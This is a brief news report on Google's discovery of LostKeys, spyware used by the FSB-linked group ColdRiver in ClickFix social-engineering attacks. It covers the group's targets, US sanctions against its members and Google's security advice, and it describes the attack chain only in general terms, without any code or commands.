Google has reported (via Android Headlines) the discovery of a new Russian spyware known as LostKeys, utilized by the hacking group ColdRiver, which is linked to the Russian FSB. This software is designed to steal files and system data from Western organizations.
According to the Google Threat Intelligence Group (GTIG), LostKeys is employed in targeted ClickFix attacks that rely on social engineering and start with a fake captcha. Victims are tricked into executing malicious PowerShell scripts that pave the way for downloading and executing additional harmful programs. The primary objective is to install LostKeys, which acts as a digital vacuum, extracting files, directories, and system information. Hackers also leverage other malware, including SPICA, to acquire documents.
The ColdRiver group has been active since 2017 and is known by various names, such as Star Blizzard and Callisto Group. Reports indicate that it has ramped up its activities in recent years, particularly with the onset of Russia's invasion of Ukraine. The group specializes in cyber espionage, targeting government and defense entities, think tanks, politicians, journalists, and NGOs.
The U.S. has already imposed sanctions on individual members of the group and announced a reward of $10 million for information leading to their capture.
Google specialists emphasize the necessity of enhancing cybersecurity, especially for organizations that could become potential targets of ColdRiver attacks. They recommend utilizing Google's advanced protection and regularly updating security systems to prevent similar threats.
